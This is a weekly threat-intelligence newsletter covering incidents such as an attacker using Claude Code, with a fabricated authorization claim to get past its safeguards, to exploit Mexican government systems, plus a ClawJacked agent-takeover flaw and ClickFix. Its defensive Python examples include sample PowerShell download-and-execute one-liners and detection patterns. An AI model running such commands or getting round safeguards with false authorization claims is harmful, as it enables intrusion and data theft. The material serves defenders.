Threat Newsletter March 9, 2026
This week's threat intel newsletter covers AI-enabled attacks, mobile exploits, infrastructure vulnerabilities, law enforcement disruptions, and cloud security incidents. Key topics include attackers using Claude Code to automate exploits against Mexican government systems, North Korea's APT37 weaponizing USB drives to breach air-gapped networks, a sophisticated iOS exploit kit (Coruna) spreading across threat actor groups, Europol's takedown of Tycoon 2FA phishing infrastructure, Google's analysis of 90 zero-days exploited in 2025, Iran's MuddyWater expanding U.S. operations, and a Google Cloud API key compromise resulting in $82K in unauthorized charges.
“Living Off the AI”: Claude Code Used to Build Exploits and Automate Exfiltration
Security researchers at Gambit Security report that attackers abused Anthropic’s Claude Code during a cyberattack campaign targeting Mexican government systems.
Key Takeaways:
⚠️Impact: The intrusions reportedly began with Mexico’s tax authority in late December 2025 and expanded to 10 government bodies plus a financial institution.
❗Attack: Based on the attacker’s logs, the threat actor sent more than 1,000 prompts to Claude Code over the course of the operation, using the assistant to write exploits, build tooling, and automate data theft. The campaign resulted in roughly 150 GB of exfiltrated data and potential exposure of 195 million identity records, including civil registry, tax, and voter data.
🔧 AI as force multiplier in practice: The assistant was used across the kill chain, not just for idea generation, but for exploit development, tool creation, and operational automation.
💡 Guardrail evasion: The attacker allegedly supplied a fabricated authorization context (a claim of legitimate permission) to get past safety controls and keep the model assisting.
🛡️ Mitigation: Treat this as an "ops acceleration" threat—harden identity and remote access, lock down egress, and detect bulk exfiltration behavior.

Rudy Jumper: APT37 Toolkit Turns USB Drives Into Covert C2 for Air-Gapped Targets
Zscaler reports that the North Korea-linked threat actor APT37 (aka ScarCruft) is using a new malware toolkit, in a campaign dubbed “Rudy Jumper”, to move data and commands between internet-connected systems and air-gapped machines.
Key Takeaways
🚨 Air-gapped does not mean safe: The actor uses USB drives to carry commands in and data out.
🪲 Malicious Toolkit: Researchers at Zscaler analyzed the malware used in the Rudy Jumper campaign and identified five components: RESTLEAF, SNAKEDROPPER, THUMBSBD, VIRUSTASK, and FOOTWINE.
⚠️Initial infection: A user opens a malicious LNK file, which launches PowerShell; PowerShell then installs a Ruby-based loader and additional components that turn attached USB drives into a covert relay for command-and-control and exfiltration.
👊USB becomes “covert C2”: The THUMBSBD component stages data in hidden folders on removable media, turning the drive into a bidirectional relay between the internet-connected and air-gapped networks.
🛡️ Mitigation: Lock down removable media by disabling or allow-listing USB storage, scanning all drives on a controlled transfer workstation, and blocking LNK-to-PowerShell execution paths to prevent USB-based air-gap bridging.

Chrome Plans Quantum-Resistant HTTPS With Merkle Tree Certificates
Google is developing a new approach to HTTPS certificates in Chrome called Merkle Tree Certificates (MTCs) to prepare the web for post-quantum cryptography without making TLS handshakes significantly larger or slower.
Key Takeaways
❗Goal: Make HTTPS more quantum-resistant while keeping performance similar to today’s TLS.
💡Why change certificates: Post-quantum algorithms can increase handshake size; MTCs aim to avoid the bandwidth bloat of traditional certificate chains.
🔧 How it works: A CA signs one Merkle tree “head” covering potentially millions of certificates, and browsers verify a site using a short proof of inclusion against that head rather than a full certificate chain.
💭 Chrome Direction: Google says Chrome has no immediate plan to add “traditional” X.509 cert chains containing post-quantum crypto to the Chrome Root Store; MTCs are the preferred path.
📈 Timeline: Testing now, broader ecosystem bootstrapping in Q1 2027, and a more complete program/root store approach targeted for Q3 2027.
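As an added illustration of the inclusion-proof idea (this is not Google's MTC implementation, which defines its own tree layout, assertion encoding and head-signing scheme), the following Python builds a SHA-256 Merkle tree over a set of constructed certificate payloads, issues an inclusion proof for one of them, and verifies it against the tree head. Signing and distributing the head is the CA's job and is out of scope here; the point is the size of what a browser must check per site.

```python
import hashlib
import hmac


def _hash_leaf(data: bytes) -> bytes:
    # RFC 6962-style domain separation: leaves and interior nodes are hashed with
    # different prefixes so a leaf value can never be passed off as a node.
    return hashlib.sha256(b"\x00" + data).digest()


def _hash_node(left: bytes, right: bytes) -> bytes:
    return hashlib.sha256(b"\x01" + left + right).digest()


def build_tree(leaves: list[bytes]) -> list[list[bytes]]:
    """Return the tree as levels: level 0 is the leaf hashes, the last level is the head."""
    if not leaves:
        raise ValueError("empty tree")
    level = [_hash_leaf(x) for x in leaves]
    levels = [level]
    while len(level) > 1:
        if len(level) % 2:                 # odd level: pair the last node with itself
            level = level + [level[-1]]
        level = [_hash_node(level[i], level[i + 1]) for i in range(0, len(level), 2)]
        levels.append(level)
    return levels


def tree_head(levels: list[list[bytes]]) -> bytes:
    return levels[-1][0]


def inclusion_proof(levels: list[list[bytes]], index: int) -> list[tuple[bytes, bool]]:
    """Sibling hashes from the leaf up to the head; the flag is True when the sibling
    sits to the right of the node on the path."""
    proof = []
    for level in levels[:-1]:
        sibling = index ^ 1
        if sibling >= len(level):          # last node of an odd level was its own sibling
            sibling = index
        proof.append((level[sibling], sibling > index))
        index //= 2
    return proof


def verify_inclusion(head: bytes, leaf: bytes, proof: list[tuple[bytes, bool]]) -> bool:
    """What a browser holding a trusted head does: recompute the path and compare."""
    h = _hash_leaf(leaf)
    for sibling, sibling_is_right in proof:
        h = _hash_node(h, sibling) if sibling_is_right else _hash_node(sibling, h)
    return hmac.compare_digest(h, head)


def demo(n_certs: int = 1000) -> dict:
    # Constructed stand-ins for certificate payloads (subject plus key); not real certs.
    certs = [f"CN=site{i}.example,key={i:08x}".encode() for i in range(n_certs)]
    levels = build_tree(certs)
    head = tree_head(levels)
    target = 617
    proof = inclusion_proof(levels, target)
    return {
        "head_hex": head.hex(),
        "proof_hashes": len(proof),        # ~log2(n) hashes instead of a full cert chain
        "proof_bytes": 32 * len(proof),
        "valid": verify_inclusion(head, certs[target], proof),
        "forged_rejected": not verify_inclusion(head, b"CN=evil.example", proof),
    }


if __name__ == "__main__":
    print(demo())
```

For 1,000 leaves the proof is 10 hashes (320 bytes), and it grows only logarithmically with the number of certificates under the head; a browser that already trusts the head needs nothing else from the CA to check the site. The odd-level duplication is the simplest construction and is enough to show the mechanism.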

OpenClaw “ClawJacked” Bug Lets Any Website Hijack a Local AI Agent
Oasis Security disclosed a high-severity vulnerability chain in OpenClaw, dubbed “ClawJacked”, in which any website a developer visits could silently connect to the local OpenClaw gateway on localhost, brute-force the gateway password, auto-register itself as a trusted device, and take full control of the agent.
🌐 Impact: A malicious website could achieve full agent takeover with no plugins, extensions, or user prompts.
⚠️ Core issue: Browsers can open WebSocket connections to localhost, and OpenClaw treated any localhost connection as trusted.
💡What made it practical: No effective rate limiting on password attempts over localhost, so a brute force from page JavaScript completed quickly.
❗Why it matters: OpenClaw often has high-value access (Slack, calendars, dev tools, credentials), so an agent takeover can amount to a workstation-level compromise.
🛠️ Fix: Update OpenClaw to 2026.2.25 or later and review what access/credentials agents have been granted.
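As an added example (illustrative code, not OpenClaw's own gateway code), the following Python contrasts the pattern the advisory describes, a localhost gateway that accepts any WebSocket upgrade and lets a page guess passwords without limit, with a hardened handshake that checks the browser-supplied Origin header against an allow-list, compares the password in constant time, and locks a client out after repeated failures. The gateway password, the allowed origin, the client identifiers and the guess space are all constructed for the demo.

```python
import hmac
import time
from collections import defaultdict
from typing import Callable, Iterable, Optional

GATEWAY_PASSWORD = "ws-1842"   # constructed demo secret, not a real default


# --- Vulnerable pattern: "it only listens on localhost, so it is safe" ---
def vulnerable_auth(origin: Optional[str], password: str) -> bool:
    # No Origin check (any web page can connect), no attempt limiting, and a
    # plain string compare. Localhost is not a trust boundary once a browser
    # tab on the same machine can open the socket.
    return password == GATEWAY_PASSWORD


# --- Hardened pattern ---
class HardenedGatewayAuth:
    def __init__(self, secret: str, allowed_origins: set, max_failures: int = 5,
                 lockout_seconds: float = 300.0, clock: Callable[[], float] = time.monotonic):
        self._secret = secret.encode()
        self._allowed_origins = allowed_origins
        self._max_failures = max_failures
        self._lockout = lockout_seconds
        self._clock = clock
        self._failures = defaultdict(int)
        self._locked_until = {}

    def authenticate(self, origin: Optional[str], password: str, client_id: str):
        # 1. Browsers always send Origin on a WebSocket upgrade, and a cross-site
        #    page carries an Origin that is not the gateway's own UI: refuse it.
        #    Design choice for this example: a missing Origin is treated as a
        #    non-browser local client and proceeds to the password check.
        if origin is not None and origin not in self._allowed_origins:
            return False, "bad_origin"
        now = self._clock()
        until = self._locked_until.get(client_id, 0.0)
        if now < until:
            return False, "locked"
        if until:                                   # lockout expired: start fresh
            del self._locked_until[client_id]
            self._failures[client_id] = 0
        # 2. Constant-time comparison so response timing does not leak the prefix.
        if hmac.compare_digest(password.encode(), self._secret):
            self._failures[client_id] = 0
            return True, "ok"
        # 3. Count failures and lock out: a script now gets max_failures guesses per
        #    lockout window instead of thousands per second.
        self._failures[client_id] += 1
        if self._failures[client_id] >= self._max_failures:
            self._locked_until[client_id] = now + self._lockout
            return False, "locked"
        return False, "bad_password"


def brute_force(try_password: Callable[[str], bool], candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate the gateway accepts, or None."""
    for cand in candidates:
        if try_password(cand):
            return cand
    return None


CANDIDATES = [f"ws-{i:04d}" for i in range(10000)]   # constructed guess space


class FakeClock:
    """Deterministic clock so the lockout window can be advanced in the demo."""
    def __init__(self):
        self.now = 1000.0

    def __call__(self) -> float:
        return self.now


def demo() -> dict:
    clock = FakeClock()
    ui_origin = "http://127.0.0.1:8080"             # assumed gateway UI origin
    gw = HardenedGatewayAuth(GATEWAY_PASSWORD, {ui_origin}, clock=clock)
    cross_site = "https://attacker.example"
    results = {
        "vulnerable_cracked": brute_force(lambda p: vulnerable_auth(cross_site, p), CANDIDATES),
        "hardened_cross_site": brute_force(lambda p: gw.authenticate(cross_site, p, "tab-1")[0], CANDIDATES),
        "hardened_same_origin": brute_force(lambda p: gw.authenticate(ui_origin, p, "tab-2")[0], CANDIDATES),
    }
    # Even the right password is refused while the lockout is active...
    results["locked_reason"] = gw.authenticate(ui_origin, GATEWAY_PASSWORD, "tab-2")[1]
    clock.now += 301                                # ...and accepted once it expires.
    results["after_expiry"] = gw.authenticate(ui_origin, GATEWAY_PASSWORD, "tab-2")
    return results


if __name__ == "__main__":
    print(demo())
```

The cross-site attempt never reaches the password check, and even a page on the allowed origin is held to five guesses per window, which turns a brute force that succeeds in seconds into one that would take years. Binding sessions to a token the page cannot obtain (rather than a password alone) is the further step a real gateway would take.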

LexisNexis Breach Confirmed Following Data Leak and Failed Extortion Attempt
LexisNexis confirmed a data breach after attackers leaked files they claim were stolen from the company’s system. LexisNexis says the incident is contained and that there is no evidence its products and services were impacted, but acknowledged exposure of certain customer and support-related information.
Key Takeaways
🚨 Confirmed breach/data leak: LexisNexis validated the incident after the attackers posted the files and attempted extortion.
💡LexisNexis downplays the scope: The company says the affected servers mostly contained older, legacy data and that the matter is contained.
🔍 What data was exposed: Customer names, user IDs, business contact details, IP addresses of customer survey respondents, and support tickets.
❗Attacker claims: The attackers say they stole 25 GB and 400,000 personal records, including some .gov-associated identities; these figures are their claims.

“Harvest Now, Decrypt Later”: Why You Need a Post-Quantum Crypto Plan Now
This article argues that organizations should start post-quantum cryptography (PQC) planning now because attackers can steal encrypted data today and decrypt it later when quantum computers are strong enough.
Key Takeaways
❗The threat is already active: Adversaries can collect encrypted traffic and data now and wait to decrypt it later.
💡 Long-lived data is the priority: Anything that must remain confidential for many years is most at risk.
🔧 Start with inventory: Build a cryptographic asset inventory (where encryption is used, which algorithms, which key sizes, which vendors).
📈 Hybrid + crypto agility are key: Expect a transition period where you run hybrid cryptography and design for algorithm agility so you can swap primitives as standards mature.
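As an added example (not code from the article), the following Python turns the inventory and "long-lived data first" points into a prioritization pass. It applies Mosca's inequality, X + Y > Z, where X is how long the data must stay confidential, Y is how long migrating that use will take, and Z is the assumed number of years until a cryptographically relevant quantum computer. Everything in the inventory rows is constructed, and the value Z = 10 is an assumption for the demo, not a forecast.

```python
from dataclasses import dataclass

# Public-key families broken outright by Shor's algorithm on a CRQC.
SHOR_BROKEN = {"RSA", "DSA", "DH", "ECDH", "ECDHE", "ECDSA", "EdDSA"}
# NIST post-quantum standards and the hybrid TLS group seen in current deployments.
POST_QUANTUM = {"ML-KEM", "ML-DSA", "SLH-DSA", "X25519MLKEM768"}
# Symmetric and hash primitives are only weakened (Grover); 256-bit keys remain comfortable.
SYMMETRIC = {"AES", "ChaCha20", "SHA-256", "SHA-3"}


@dataclass
class CryptoAsset:
    name: str
    algorithm: str
    key_bits: int
    vendor: str
    secrecy_years: float     # X: how long the protected data must stay confidential
    migration_years: float   # Y: estimated time to replace this use of the algorithm


def classify(asset: CryptoAsset, years_to_crqc: float):
    """Return (verdict, years_of_shortfall). 'urgent' means traffic captured today will be
    readable before the migration lands (X + Y > Z); 'plan' means the algorithm still has
    to go, but the data it protects will have expired by then."""
    shortfall = asset.secrecy_years + asset.migration_years - years_to_crqc
    if asset.algorithm in POST_QUANTUM:
        return "ok", 0.0
    if asset.algorithm in SHOR_BROKEN:
        return ("urgent" if shortfall > 0 else "plan"), max(shortfall, 0.0)
    if asset.algorithm in SYMMETRIC:
        return ("raise-key-size" if asset.key_bits < 256 else "ok"), 0.0
    return "unknown-review", 0.0      # not in any list: a human has to look at it


def prioritize(assets, years_to_crqc: float):
    """Sort the inventory so the worst exposures come first, largest shortfall on top."""
    rows = [(a, *classify(a, years_to_crqc)) for a in assets]
    order = {"urgent": 0, "raise-key-size": 1, "plan": 2, "unknown-review": 3, "ok": 4}
    rows.sort(key=lambda r: (order[r[1]], -r[2]))
    return [(a.name, verdict, round(short, 1)) for a, verdict, short in rows]


# Constructed inventory rows; vendors and lifetimes are illustrative.
INVENTORY = [
    CryptoAsset("site-to-site VPN (IKEv2)", "RSA", 2048, "vendor-A", secrecy_years=15, migration_years=3),
    CryptoAsset("public web TLS key exchange", "ECDHE", 256, "vendor-B", secrecy_years=0.5, migration_years=1),
    CryptoAsset("backup archive encryption", "AES", 128, "in-house", secrecy_years=25, migration_years=2),
    CryptoAsset("code-signing certificates", "ECDSA", 256, "vendor-C", secrecy_years=0, migration_years=5),
    CryptoAsset("pilot TLS hybrid group", "X25519MLKEM768", 0, "vendor-B", secrecy_years=0.5, migration_years=0),
    CryptoAsset("HR records database TDE", "AES", 256, "vendor-D", secrecy_years=30, migration_years=1),
    CryptoAsset("legacy EDI link", "3DES", 112, "vendor-E", secrecy_years=7, migration_years=4),
]

if __name__ == "__main__":
    for row in prioritize(INVENTORY, years_to_crqc=10):
        print(row)
```

The VPN lands on top: its traffic must stay secret for 15 years and the swap takes 3, so a recording made today is exposed 8 years before a 10-year CRQC horizon is even reached. The web session key exchange uses the same broken family but protects data that is stale within months, so it is a planned migration rather than an emergency. That distinction is what the inventory exists to surface.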

Thousands of Honeywell IQ4 Controllers Found Internet-Exposed Amid Vulnerability Dispute
A security researcher (Gjoko Krstic) reports a high-risk issue affecting Honeywell’s IQ4 building-management controller, claiming the web-based management interface (HMI) can be reachable without authentication in factory-default or misconfigured setups.
Key Takeaways
❗Core risk: IQ4 controllers may be internet-exposed, with claims that some HMIs are reachable without login.
🔒Misconfiguration window matters: The researcher says that, until a particular module is enabled during setup, an attacker can create an admin account, potentially locking out operators.
🗣️Dispute: Honeywell says there is no operational impact in the described state and no patch is planned, because the device is meant to be installed securely and not exposed to the internet.
🌐 Exposure: The researcher claims around 7,500 IQ4 instances are internet-exposed and estimates 20% may be accessible without authentication.

Coruna iOS Exploit Kit: Five Chains, 23 Exploits, and Rapid Threat Actor Proliferation
Google Threat Intelligence Group (GTIG) details Coruna, a sophisticated iOS exploit kit that targeted iPhones running iOS 13.0 through 17.2.1. The kit includes five full exploit chains and 23 total exploits, and was observed “proliferating” across multiple threat actors and use cases: first in highly targeted surveillance-style operations, later in watering hole attacks against Ukrainian users (linked to a suspected Russian espionage cluster), and eventually in broad-scale campaigns by a China-based financially motivated actor using scam sites.
Key Takeaways
❗Big capability bundle: Coruna is a “full kit” (multiple chains + many exploits), not a single iOS bug.
🚨 Wide iOS coverage: Targets a long span of versions (iOS 13 → 17.2.1), increasing the pool of vulnerable devices.
🔍Delivery patterns: Web-based exploitation via injected or hidden content (iframes), with fingerprinting to match the visiting iPhone and iOS version to the right exploit chain.
💡Post-exploitation focus shifted to theft: The observed end payload included modules aimed at stealing financial and crypto-wallet data, not just classic surveillance.
🛡️ Defense: Update iOS to the latest version. If you cannot, enable Lockdown Mode to reduce exploitation risk.

Operation Shuts Down Tycoon 2FA PhaaS, Linked to Massive MFA Bypass Campaigns
A Europol-led coalition of law enforcement and private-sector partners dismantled “Tycoon 2FA”, a major phishing-as-a-service (PhaaS) operation used for adversary-in-the-middle (AiTM) attacks that steal credentials and MFA codes or session cookies to enable account takeover.
Key Takeaways
🎉 Big disruption: Law enforcement and partners took down Tycoon 2FA infrastructure, including 330 domains.
❗Why it mattered: Tycoon 2FA enabled AiTM phishing that can bypass MFA in practice by stealing session cookies/tokens, not just passwords.
🌐 Scale: The kit was tied to 64,000+ phishing incidents and tens of millions of phishing emails per month.
🎯 Enterprise-focused: Targeting was largely business environments (enterprise-managed accounts, paid domains), spanning many sectors like healthcare, education, finance, and government.
🛡️ Defender-reminder: Password resets alone may not be enough after AiTM phishing. Organizations often need to revoke sessions/tokens to fully cut off access.

Google: 90 Zero-Days Exploited in 2025, Nearly Half Targeted Enterprise Tech
Google Threat Intelligence Group (GTIG) reviewed 90 zero-day vulnerabilities exploited in-the-wild in 2025. The key trend is a continued shift toward enterprise and perimeter/edge technologies as primary targets, while browser exploitation dropped and operating system exploitation increased.
Key Takeaways
❗90 zero-days in 2025: Up from 2024, when GTIG tracked 78.
⚠️ Enterprise exploitation hit a high: 43 zero-days (48%) impacted enterprise technologies, including security and networking appliances.
🎯 Edge devices remain prime initial access: Espionage groups heavily target security appliances and perimeter devices, which are often hard to monitor and lack EDR visibility.
💡Browser down, OS up: Browser zero-days fell to historical lows, while operating systems made up the largest slice of exploitation; GTIG cited 39 OS zero-days.
🥷 PRC-linked espionage still dominates state use: PRC-nexus groups remained the most prolific state users, with a strong focus on edge/security devices.
🔍 Money-motivated zero-days rebounded: GTIG attributed 9 zero-days to financially motivated groups in 2025.

Iran’s MuddyWater Expands U.S. Targeting Amid Conflict, Deploys New Backdoor
Researchers from Symantec and Carbon Black report that the Iran-linked threat group MuddyWater (Seedworm), assessed to be affiliated with Iran’s MOIS, has been found operating in multiple U.S. organizations (including banks, an airport, and non-profits).
Key Takeaways
🥷APT: MuddyWater (Seedworm) has been active in multiple U.S. organizations, including banks, an airport, and nonprofits, as well as an Israel-based operation of a software company tied to defense and aerospace supply chains.
🪲New backdoor: The group appears to be deploying a new backdoor called “Dindoor” that uses the Deno JavaScript runtime, and a separate Python backdoor (“Fakeset”) in other environments.
🛡️ Defender focus: The group relies on credential theft, password spraying, and social engineering as repeatable access methods, then persists via common enterprise services. Organizations should prioritize phishing-resistant MFA, reduce internet exposure, and tighten monitoring around identity and cloud control planes.

ClickFix Evolves: Windows Terminal Now the Social-Engineering Execution Path
A newer wave of ClickFix social-engineering attacks is pushing victims to open Windows Terminal (wt.exe) and paste a command copied to the clipboard by a malicious webpage. That command runs PowerShell in-memory, pulls down additional stages, and ultimately deploys Lumma Stealer to steal browser credentials and data. The shift to Windows Terminal helps the activity look more “normal” and may evade detection tuned to Win+R / Run dialog abuse.
Key Takeaways
❗It is not a software bug: Execution is user-driven, so patching does not “fix” it.
🚨 Attack: Fake CAPTCHA or “verification” pages pressure users to paste a command into the terminal.
🔍 New behavior to watch: PowerShell spawned from wt.exe (Windows Terminal) and suspicious clipboard-driven command execution.
🚚 Delivery: Threat actors deliver Lumma Stealer and steal browser credentials from Chrome and Edge.
🛡️ Defense: Train users to never paste commands from websites, restrict Terminal and PowerShell to admin workflows where possible, and alert on unusual scheduled tasks and persistence paths.
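As an added example (not code from the original report), the following Python runs the "PowerShell spawned from Windows Terminal" hunt over a handful of constructed process-creation events in the shape of Sysmon Event ID 1 records. It scores each PowerShell command line against markers typical of pasted one-liners (in-memory execution, web download cmdlets, encoded commands, hidden windows) and tags the execution path by walking the parent chain, so the terminal-based variant and the older Run-dialog variant are both caught. It generalizes slightly beyond the article by also covering the explorer.exe (Win+R) parent. Assumptions: the terminal's shell process usually shows up in telemetry as a child of WindowsTerminal.exe rather than of the wt.exe launcher, so both names are matched; image paths, PIDs and the `example.invalid` staging host are constructed.

```python
import re

# Terminal host images; the shell is normally a child of WindowsTerminal.exe (assumption).
TERMINAL_IMAGES = {"wt.exe", "windowsterminal.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Weighted command-line markers typical of pasted ClickFix one-liners.
SUSPICIOUS = [
    (re.compile(r"invoke-expression|\biex\b", re.I), 3),
    (re.compile(r"invoke-restmethod|\birm\b|invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I), 3),
    (re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\b|frombase64string", re.I), 2),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    (re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I), 1),
    (re.compile(r"\bmshta\b|\bcertutil\b|\bcurl\b", re.I), 2),
]
ALERT_THRESHOLD = 4

# Constructed process-creation events (Sysmon event 1 style); not real telemetry.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Users\alice\AppData\Local\Microsoft\WindowsApps\wt.exe", "cmdline": "wt.exe"},
    {"pid": 250, "ppid": 200, "image": r"C:\Program Files\WindowsApps\WindowsTerminal.exe", "cmdline": "WindowsTerminal.exe"},
    # Default profile starting PowerShell: benign, no arguments.
    {"pid": 300, "ppid": 250, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe"},
    # The pasted ClickFix one-liner, run from the interactive shell above.
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (irm http://example.invalid/stage2)"'},
    # Older Win+R variant: explorer.exe is the parent, payload is an encoded command.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoP -w hidden -enc SQBFAFgA"},
    # Ordinary scripted use from the terminal: should not alert.
    {"pid": 600, "ppid": 250, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoLogo -File C:\build\deploy.ps1"},
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ancestry(event: dict, by_pid: dict, max_depth: int = 8) -> list:
    """Parent image names from the immediate parent upward."""
    chain = []
    ppid = event["ppid"]
    while ppid in by_pid and len(chain) < max_depth:
        parent = by_pid[ppid]
        chain.append(_basename(parent["image"]))
        ppid = parent["ppid"]
    return chain


def analyze(events: list) -> list:
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if _basename(e["image"]) not in SHELL_IMAGES:
            continue
        hits = [(pat.pattern, w) for pat, w in SUSPICIOUS if pat.search(e["cmdline"])]
        score = sum(w for _, w in hits)
        if score < ALERT_THRESHOLD:
            continue
        chain = _ancestry(e, by_pid)
        if any(p in TERMINAL_IMAGES for p in chain):
            path = "windows-terminal"
        elif chain and chain[0] == "explorer.exe":
            path = "run-dialog-or-explorer"
        else:
            path = "other"
        findings.append({"pid": e["pid"], "score": score, "path": path,
                         "ancestry": chain, "markers": [p for p, _ in hits]})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f)
```

Only the two pasted commands alert; the terminal's own profile launch and a scripted `-File` run score zero. Scoring on the command line rather than on the parent alone is what keeps this usable on developer machines, where Windows Terminal spawning PowerShell is routine.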

China-Nexus UAT-9244 Targets Telecoms With New Multi-Platform Malware Toolkit
A China-aligned APT cluster (UAT-9244) has been targeting telecommunication providers in South America since 2024. The campaign uses a purpose-built toolkit with three implants to maintain access across Windows, Linux, and network edge devices, enabling long-term intrusion and lateral expansion inside telecom infrastructure.
Key Takeaways
🎯 Target focus: The threat actors are targeting Telecom providers and the critical routing/management edge devices they rely on.
🪲Three-tool toolkit (different roles):
- TernDoor: Windows backdoor in the CrowDoor variant lineage.
- PeerTime: Linux backdoor that uses BitTorrent for C2, helping its traffic blend with normal P2P patterns.
- BruteEntry: Turns compromised edge devices into ORBs (Operational Relay Boxes) used to brute-force SSH, PostgreSQL, and Tomcat targets to expand access.
💡Notable tradecraft (Windows side): DLL side-loading, in-memory shellcode execution, injection into msiexec.exe, persistence via scheduled tasks and Run keys, and a driver used to manipulate processes (potentially to interfere with security tooling).
🛡️Defender focus: Hunt for DLL side-loading patterns, anomalous scheduled tasks and Run keys, unusual driver installs, BitTorrent-like traffic from servers that should not be using it, and brute-force behavior originating from edge devices acting as relays.

Gemini API Key Compromise Turns a $180 Month Into an $82K Incident
A small development team had a Google Cloud API key stolen and abused to call high-cost Gemini endpoints, which drove $82,314.44 in unauthorized usage charges in about 48 hours.
Key Takeaways
🚨 This is a cost-exhaustion attack: attackers do not need to steal data to cause major harm; they can just burn API credits at scale.
💥 Blast radius comes from defaults: if API keys are left “unrestricted,” old/exposed keys can become powerful when new services (like Gemini) are enabled.
🔧 Guardrails to set now (practical):
- Billing budgets with alerts and automated enforcement at a cap.
- Restrict keys to specific APIs and limit by IP/referrer.
- Tight quota caps (RPM/RPD) aligned to real usage.
- Prefer short-lived credentials (service accounts / workload identity) over long-lived keys.
🔍 Detectability: watch for sudden spend spikes, unexpected endpoint usage (Gemini models you do not use), and anomalous geography or request volume.
💡 Incident response note: Deleting or rotating the key is necessary but may not reverse the billing; documentation (logs, evidence of compromise, reports) can matter in disputes.
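As an added example (not code from the incident write-up), the following Python implements the detectability points above over a constructed hourly billing export: it flags services the team does not use, per-service spend spikes against a trailing 24-hour median, and the first hour at which cumulative spend crosses the budget cap. The rows model a quiet ~$180/month footprint followed by a stolen key hammering a Gemini endpoint; the service names, the budget figure and the hourly costs are all constructed, and the `action` value is where an automated hook would fire.

```python
from statistics import median

# Assumptions for a small team: what it actually uses, and a monthly cap with some
# headroom over a ~$180/month baseline.
EXPECTED_SERVICES = {"Cloud Storage", "Cloud Run"}
MONTHLY_BUDGET_USD = 300.0


def build_sample_rows() -> list:
    """Constructed hourly billing-export rows (hour, service, usd_cost), not real data:
    36 quiet hours, then a stolen key starts driving a high-cost model endpoint."""
    rows = []
    for hour in range(48):
        rows.append((hour, "Cloud Storage", 0.10))
        rows.append((hour, "Cloud Run", 0.15))
        if hour >= 36:
            rows.append((hour, "Gemini API", 900.0))
    return rows


def analyze_spend(rows, expected=EXPECTED_SERVICES, budget=MONTHLY_BUDGET_USD,
                  spike_factor: float = 10.0, min_abs_usd: float = 5.0) -> dict:
    """Walk the hours in order and report unexpected services, spikes versus each
    service's trailing-24h median, and the first hour cumulative spend exceeds budget."""
    by_hour = {}
    for hour, service, cost in rows:
        bucket = by_hour.setdefault(hour, {})
        bucket[service] = bucket.get(service, 0.0) + cost

    history = {}
    findings = {"unexpected_services": set(), "spikes": [],
                "budget_breach_hour": None, "action": None}
    cumulative = 0.0
    for hour in sorted(by_hour):
        for service, cost in by_hour[hour].items():
            cumulative += cost
            if service not in expected:
                findings["unexpected_services"].add(service)
            # A brand-new service has no baseline, so anything above the absolute
            # floor counts as a spike; an established one must jump spike_factor x.
            baseline = median(history[service][-24:]) if history.get(service) else 0.0
            if cost >= max(min_abs_usd, spike_factor * baseline):
                findings["spikes"].append((hour, service, cost, baseline))
            history.setdefault(service, []).append(cost)
        if findings["budget_breach_hour"] is None and cumulative > budget:
            findings["budget_breach_hour"] = hour
            findings["action"] = "disable-billing-or-revoke-key"
    findings["total_usd"] = round(cumulative, 2)
    return findings


if __name__ == "__main__":
    print(analyze_spend(build_sample_rows()))
```

The first abusive hour trips all three signals at once: a service outside the allow-list, a spike with no baseline, and a budget breach in that same hour. Cloud budget alerts notify but do not stop spending on their own, so the `action` field is the hook point for something that actually revokes the key or detaches billing; the lag between that hour and a human reading an email is where the $82K accumulated.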
